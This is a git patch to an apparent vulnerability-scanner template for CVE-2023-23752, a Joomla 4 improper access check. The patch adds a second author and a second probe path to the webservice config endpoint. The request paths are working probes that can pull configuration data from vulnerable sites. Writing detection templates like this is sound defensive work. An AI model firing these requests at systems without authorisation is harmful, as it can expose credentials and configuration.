From b2a330035781e64c0e38994a2f4b4bc56be168ce Mon Sep 17 00:00:00 2001 From: Sascha Brendel Date: Mon, 20 Feb 2023 14:03:55 +0100 Subject: [PATCH] Added additional path for vulnerability. --- cves/2023/CVE-2023-23752.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2023/CVE-2023-23752.yaml b/cves/2023/CVE-2023-23752.yaml index 1c377bcd4f..d72180f345 100644 --- a/cves/2023/CVE-2023-23752.yaml +++ b/cves/2023/CVE-2023-23752.yaml @@ -2,7 +2,7 @@ id: CVE-2023-23752 info: name: Joomla Improper AccessCheck in WebService Endpoint - author: badboycxcc + author: badboycxcc, Sascha Brendel severity: high description: | An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. @@ -21,6 +21,7 @@ requests: - method: GET path: - '{{BaseURL}}/api/index.php/v1/config/application?public=true' + - '{{BaseURL}}/api/v1/config/application?public=true' matchers-condition: and matchers: